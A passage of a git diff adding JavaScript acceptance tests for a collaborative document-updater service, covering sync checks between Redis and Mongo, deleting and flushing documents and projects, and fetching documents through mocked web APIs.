+  describe('without projects', function () {
+    it('should work when in sync', async function () {
+      const result = await runScript({})
+      expect(result.code).to.equal(0)
+      expect(result.stdout).to.include('Processed 0 projects')
+      expect(result.stdout).to.include(
+        'Found 0 projects with 0 out of sync docs'
+      )
+    })
+  })
+
+  describe('with a project', function () {
+    let projectId, docId
+    beforeEach(function (done) {
+      projectId = DocUpdaterClient.randomId()
+      docId = DocUpdaterClient.randomId()
+      MockWebApi.insertDoc(projectId, docId, {
+        lines: ['mongo', 'lines'],
+        version: 1,
+      })
+      DocUpdaterClient.getDoc(projectId, docId, done)
+    })
+
+    it('should work when in sync', async function () {
+      const result = await runScript({})
+      expect(result.code).to.equal(0)
+      expect(result.stdout).to.include('Processed 1 projects')
+      expect(result.stdout).to.include(
+        'Found 0 projects with 0 out of sync docs'
+      )
+
+      expect(peekDocumentInDocstore).to.not.have.been.called
+    })
+
+    describe('with out of sync lines', function () {
+      beforeEach(function () {
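+        // Editor's note: the doc was already loaded into Redis by the
+        // getDoc call above; re-inserting different lines into MockWebApi
+        // simulates Mongo changing behind the updater's back, which the
+        // script must report as out of sync.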
+ MockWebApi.insertDoc(projectId, docId, { + lines: ['updated', 'mongo', 'lines'], + version: 1, + }) + }) + + it('should detect the out of sync state', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + }) + + describe('with out of sync ranges', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + ranges: { changes: ['FAKE CHANGE'] }, + }) + }) + + it('should detect the out of sync state', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + }) + + describe('with out of sync version', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 2, + }) + }) + + it('should detect the out of sync state', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + + it('should auto-fix the out of sync state', async function () { + const result = await runScript({ + AUTO_FIX_VERSION_MISMATCH: 'true', + }) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + }) + }) + + describe('with a project', function () { + let projectId2, docId2 + beforeEach(function (done) { + projectId2 = DocUpdaterClient.randomId() + docId2 = DocUpdaterClient.randomId() + MockWebApi.insertDoc(projectId2, docId2, { + lines: ['mongo', 'lines'], + version: 1, + }) + DocUpdaterClient.getDoc(projectId2, docId2, done) + }) + + it('should work when in sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + }) + + describe('with one out of sync', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['updated', 'mongo', 'lines'], + version: 1, + }) + }) + + it('should detect one project out of sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + + it('should write differences to disk', async function () { + const FOLDER = '/tmp/folder' + await fs.promises.rm(FOLDER, { recursive: true, force: true }) + const result = await runScript({ + WRITE_CONTENT: 'true', + FOLDER, + }) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + + const dir = Path.join(FOLDER, projectId, docId) + expect(await fs.promises.readdir(FOLDER)).to.deep.equal([projectId]) + expect(await fs.promises.readdir(dir)).to.deep.equal([ + 'mongo-snapshot.txt', + 'redis-snapshot.txt', + ]) + expect( + await fs.promises.readFile( + Path.join(dir, 'mongo-snapshot.txt'), + 'utf-8' + ) + 
).to.equal('updated\nmongo\nlines') + expect( + await fs.promises.readFile( + Path.join(dir, 'redis-snapshot.txt'), + 'utf-8' + ) + ).to.equal('mongo\nlines') + }) + }) + + describe('with both out of sync', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['updated', 'mongo', 'lines'], + version: 1, + }) + MockWebApi.insertDoc(projectId2, docId2, { + lines: ['updated2', 'mongo', 'lines'], + version: 1, + }) + }) + + it('should detect both projects out of sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 2 projects with 2 out of sync docs' + ) + }) + }) + }) + }) + + describe('with more projects than the LIMIT', function () { + for (let i = 0; i < 20; i++) { + beforeEach(function (done) { + const projectId = DocUpdaterClient.randomId() + const docId = DocUpdaterClient.randomId() + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + }) + DocUpdaterClient.getDoc(projectId, docId, done) + }) + } + + it('should flag limit', async function () { + const result = await runScript({ LIMIT: '4' }) + expect(result.code).to.equal(2) + // A redis SCAN may return more than COUNT (aka LIMIT) entries. Match loosely. + expect(result.stdout).to.match(/Processed \d+ projects/) + expect(result.stderr).to.include( + 'Found too many un-flushed projects (LIMIT=4). Please fix the reported projects first, then try again.' + ) + }) + + it('should continue with auto-flush', async function () { + const result = await runScript({ + LIMIT: '4', + FLUSH_IN_SYNC_PROJECTS: 'true', + }) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 20 projects') + }) + }) + + describe('with partially deleted doc', function () { + let projectId, docId + beforeEach(function (done) { + projectId = DocUpdaterClient.randomId() + docId = DocUpdaterClient.randomId() + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + }) + MockDocstoreApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + }) + DocUpdaterClient.getDoc(projectId, docId, err => { + MockWebApi.clearDocs() + done(err) + }) + }) + describe('with only the file-tree entry deleted', function () { + it('should flag the partial deletion', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + `Found partially deleted doc ${docId} in project ${projectId}: use AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA=true to fix metadata` + ) + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + expect(MockDocstoreApi.getDoc(projectId, docId)).to.not.include({ + deleted: true, + name: 'c.tex', + }) + expect(peekDocumentInDocstore).to.have.been.called + }) + it('should autofix the partial deletion', async function () { + const result = await runScript({ + AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA: 'true', + }) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + `Found partially deleted doc ${docId} in project ${projectId}: fixing metadata` + ) + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + + expect(MockDocstoreApi.getDoc(projectId, docId)).to.include({ + deleted: true, + name: 'c.tex', + }) + + const result2 = await 
runScript({}) + expect(result2.code).to.equal(0) + expect(result2.stdout).to.include('Processed 1 projects') + expect(result2.stdout).to.not.include( + `Found partially deleted doc ${docId} in project ${projectId}` + ) + expect(result2.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + }) + }) + describe('with docstore metadata updated', function () { + beforeEach(function (done) { + MockDocstoreApi.patchDocument( + projectId, + docId, + { + deleted: true, + deletedAt: new Date(), + name: 'c.tex', + }, + done + ) + }) + + it('should work when in sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.not.include( + `Found partially deleted doc ${docId} in project ${projectId}` + ) + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + expect(peekDocumentInDocstore).to.have.been.called + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/DeletingADocumentTests.js b/services/document-updater/test/acceptance/js/DeletingADocumentTests.js new file mode 100644 index 0000000..24aef32 --- /dev/null +++ b/services/document-updater/test/acceptance/js/DeletingADocumentTests.js @@ -0,0 +1,174 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Deleting a document', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.update = { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + + sinon.spy(MockProjectHistoryApi, 'flushProject') + DocUpdaterApp.ensureRunning(done) + }) + + after(function () { + MockProjectHistoryApi.flushProject.restore() + }) + + describe('when the updated doc exists in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockWebApi, 'getDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + }, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.setDocument.restore() + MockWebApi.getDocument.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should send the updated document and version to the web api', 
function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.result, this.version + 1) + .should.equal(true) + }) + + it('should need to reload the doc if read again', function (done) { + MockWebApi.getDocument.resetHistory() + MockWebApi.getDocument.called.should.equals(false) + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + done() + } + ) + }) + + it('should flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('when the doc is not in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + }) + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.deleteDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockWebApi.setDocument.restore() + MockWebApi.getDocument.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should not need to send the updated document to the web api', function () { + MockWebApi.setDocument.called.should.equal(false) + }) + + it('should need to reload the doc if read again', function (done) { + MockWebApi.getDocument.called.should.equals(false) + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + done() + } + ) + }) + + it('should flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/DeletingAProjectTests.js b/services/document-updater/test/acceptance/js/DeletingAProjectTests.js new file mode 100644 index 0000000..cca0b4d --- /dev/null +++ b/services/document-updater/test/acceptance/js/DeletingAProjectTests.js @@ -0,0 +1,357 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
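+// Editor's note (illustrative sketch, not part of the original suite):
+// each test below follows the same shape -- every doc becomes one
+// callback-style task, and the tasks run strictly in order:
+//
+//   async.series(
+//     docs.map(doc => callback =>
+//       DocUpdaterClient.preloadDoc(projectId, doc.id, callback)
+//     ),
+//     error => { /* then DELETE the project and assert on the spies */ }
+//   )
+//
+// async.series stops at the first error, so Redis is in a known state
+// before the delete request is issued.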
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const async = require('async') + +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Deleting a project', function () { + beforeEach(function (done) { + let docId0, docId1 + this.project_id = DocUpdaterClient.randomId() + this.docs = [ + { + id: (docId0 = DocUpdaterClient.randomId()), + lines: ['one', 'two', 'three'], + update: { + doc: docId0, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: 0, + }, + updatedLines: ['one', 'one and a half', 'two', 'three'], + }, + { + id: (docId1 = DocUpdaterClient.randomId()), + lines: ['four', 'five', 'six'], + update: { + doc: docId1, + op: [ + { + i: 'four and a half\n', + p: 5, + }, + ], + v: 0, + }, + updatedLines: ['four', 'four and a half', 'five', 'six'], + }, + ] + for (const doc of Array.from(this.docs)) { + MockWebApi.insertDoc(this.project_id, doc.id, { + lines: doc.lines, + version: doc.update.v, + }) + } + + DocUpdaterApp.ensureRunning(done) + }) + + describe('without updates', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + callback(error) + }) + } + }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProject( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + done() + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should not send any document to the web api', function () { + MockWebApi.setDocument.should.not.have.been.called + }) + + it('should need to reload the docs if read again', function (done) { + sinon.spy(MockWebApi, 'getDocument') + async.series( + this.docs.map(doc => { + return callback => { + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(false) + DocUpdaterClient.getDoc( + this.project_id, + doc.id, + (error, res, returnedDoc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(true) + callback() + } + ) + } + }), + () => { + MockWebApi.getDocument.restore() + done() + } + ) + }) + + it('should flush each doc in project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('with documents which have been updated', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + if (error != null) { + return callback(error) + } + DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + callback(error) + } + ) + }) + } 
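+          // Editor's note: one task per doc -- preload it into Redis, then
+          // apply its update -- so the project delete below has dirty,
+          // unflushed docs that must be written back to the web API.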
+ }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProject( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + done() + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should send each document to the web api', function () { + Array.from(this.docs).map(doc => + MockWebApi.setDocument + .calledWith(this.project_id, doc.id, doc.updatedLines) + .should.equal(true) + ) + }) + + it('should need to reload the docs if read again', function (done) { + sinon.spy(MockWebApi, 'getDocument') + async.series( + this.docs.map(doc => { + return callback => { + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(false) + DocUpdaterClient.getDoc( + this.project_id, + doc.id, + (error, res, returnedDoc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(true) + callback() + } + ) + } + }), + () => { + MockWebApi.getDocument.restore() + done() + } + ) + }) + + it('should flush each doc in project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('with the background=true parameter from realtime and no request to flush the queue', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + if (error != null) { + return callback(error) + } + DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + callback(error) + } + ) + }) + } + }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProjectOnShutdown( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + done() + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should not send any documents to the web api', function () { + MockWebApi.setDocument.called.should.equal(false) + }) + + it('should not flush to project history', function () { + MockProjectHistoryApi.flushProject.called.should.equal(false) + }) + }) + + describe('with the background=true parameter from realtime and a request to flush the queue', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + if (error != null) { + return callback(error) + } + DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + callback(error) + } + ) + }) + } + }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProjectOnShutdown( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + // after deleting the project and putting it in the queue, 
flush the queue + setTimeout(() => DocUpdaterClient.flushOldProjects(done), 2000) + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should send each document to the web api', function () { + Array.from(this.docs).map(doc => + MockWebApi.setDocument + .calledWith(this.project_id, doc.id, doc.updatedLines) + .should.equal(true) + ) + }) + + it('should flush to project history', function () { + MockProjectHistoryApi.flushProject.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/FlushingAProjectTests.js b/services/document-updater/test/acceptance/js/FlushingAProjectTests.js new file mode 100644 index 0000000..3f60004 --- /dev/null +++ b/services/document-updater/test/acceptance/js/FlushingAProjectTests.js @@ -0,0 +1,141 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const async = require('async') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Flushing a project', function () { + before(function (done) { + let docId0, docId1 + this.project_id = DocUpdaterClient.randomId() + this.docs = [ + { + id: (docId0 = DocUpdaterClient.randomId()), + lines: ['one', 'two', 'three'], + update: { + doc: docId0, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: 0, + }, + updatedLines: ['one', 'one and a half', 'two', 'three'], + }, + { + id: (docId1 = DocUpdaterClient.randomId()), + lines: ['four', 'five', 'six'], + update: { + doc: docId1, + op: [ + { + i: 'four and a half\n', + p: 5, + }, + ], + v: 0, + }, + updatedLines: ['four', 'four and a half', 'five', 'six'], + }, + ] + for (const doc of Array.from(this.docs)) { + MockWebApi.insertDoc(this.project_id, doc.id, { + lines: doc.lines, + version: doc.update.v, + }) + } + return DocUpdaterApp.ensureRunning(done) + }) + + return describe('with documents which have been updated', function () { + before(function (done) { + sinon.spy(MockWebApi, 'setDocument') + + return async.series( + this.docs.map(doc => { + return callback => { + return DocUpdaterClient.preloadDoc( + this.project_id, + doc.id, + error => { + if (error != null) { + return callback(error) + } + return DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + return callback(error) + } + ) + } + ) + } + }), + error => { + if (error != null) { + throw error + } + return setTimeout(() => { + return DocUpdaterClient.flushProject( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + return done() + } + ) + }, 200) + } + ) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + it('should return a 204 status code', function () { + return this.statusCode.should.equal(204) + }) + + it('should send each document to the web api', function () { + return Array.from(this.docs).map(doc => + MockWebApi.setDocument + 
.calledWith(this.project_id, doc.id, doc.updatedLines) + .should.equal(true) + ) + }) + + return it('should update the lines in the doc updater', function (done) { + return async.series( + this.docs.map(doc => { + return callback => { + return DocUpdaterClient.getDoc( + this.project_id, + doc.id, + (error, res, returnedDoc) => { + if (error) return done(error) + returnedDoc.lines.should.deep.equal(doc.updatedLines) + return callback() + } + ) + } + }), + done + ) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/FlushingDocsTests.js b/services/document-updater/test/acceptance/js/FlushingDocsTests.js new file mode 100644 index 0000000..d6c5d85 --- /dev/null +++ b/services/document-updater/test/acceptance/js/FlushingDocsTests.js @@ -0,0 +1,162 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const async = require('async') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Flushing a doc to Mongo', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.update = { + doc: this.doc_id, + meta: { user_id: 'last-author-fake-id' }, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when the updated doc exists in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon.spy(MockWebApi, 'setDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.sendUpdates( + this.project_id, + this.doc_id, + [this.update], + error => { + if (error != null) { + throw error + } + return setTimeout(() => { + return DocUpdaterClient.flushDoc(this.project_id, this.doc_id, done) + }, 200) + } + ) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + it('should flush the updated doc lines and version to the web api', function () { + return MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.result, this.version + 1) + .should.equal(true) + }) + + return it('should flush the last update author and time to the web api', function () { + const lastUpdatedAt = MockWebApi.setDocument.lastCall.args[5] + parseInt(lastUpdatedAt).should.be.closeTo(new Date().getTime(), 30000) + + const lastUpdatedBy = MockWebApi.setDocument.lastCall.args[6] + return lastUpdatedBy.should.equal('last-author-fake-id') + }) + }) + + describe('when the doc does not exist in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + }) + sinon.spy(MockWebApi, 'setDocument') + 
return DocUpdaterClient.flushDoc(this.project_id, this.doc_id, done) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + return it('should not flush the doc to the web api', function () { + return MockWebApi.setDocument.called.should.equal(false) + }) + }) + + return describe('when the web api http request takes a long time on first request', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + let t = 30000 + sinon + .stub(MockWebApi, 'setDocument') + .callsFake( + ( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy, + callback + ) => { + if (callback == null) { + callback = function () {} + } + setTimeout(callback, t) + return (t = 0) + } + ) + return DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, done) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + return it('should still work', function (done) { + const start = Date.now() + return DocUpdaterClient.flushDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(204) + const delta = Date.now() - start + expect(delta).to.be.below(20000) + return done() + } + ) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/GettingADocumentTests.js b/services/document-updater/test/acceptance/js/GettingADocumentTests.js new file mode 100644 index 0000000..6529893 --- /dev/null +++ b/services/document-updater/test/acceptance/js/GettingADocumentTests.js @@ -0,0 +1,293 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
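+// Editor's note: these tests exercise the updater's Redis cache. A GET for
+// a doc that is not loaded falls through to the web API (observed by
+// spying on MockWebApi.getDocument); once a doc is loaded, further GETs
+// are served from Redis without touching the web API again.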
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Getting a document', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when the document is not loaded', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon.spy(MockWebApi, 'getDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + if (error) return done(error) + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should load the document from the web API', function () { + return MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the document lines', function () { + return this.returnedDoc.lines.should.deep.equal(this.lines) + }) + + return it('should return the document at its current version', function () { + return this.returnedDoc.version.should.equal(this.version) + }) + }) + + describe('when the document is already loaded', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + if (error) return done(error) + this.returnedDoc = returnedDoc + return done() + } + ) + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should not load the document from the web API', function () { + return MockWebApi.getDocument.called.should.equal(false) + }) + + return it('should return the document lines', function () { + return this.returnedDoc.lines.should.deep.equal(this.lines) + }) + }) + + describe('when the request asks for some recent ops', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: (this.lines = ['one', 'two', 'three']), + }) + + this.updates = __range__(0, 199, true).map(v => ({ + doc_id: this.doc_id, + op: [{ i: v.toString(), p: 0 }], + v, + })) + + return DocUpdaterClient.sendUpdates( + this.project_id, + this.doc_id, + this.updates, + error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + 
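+    // Editor's note: 200 updates (v = 0..199) were applied above, but the
+    // updater only keeps a window of recent ops (per the comment below,
+    // the last 100). Asking for ops since v=190 succeeds with 10 ops,
+    // while asking since v=10 falls outside the window and yields a 422.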
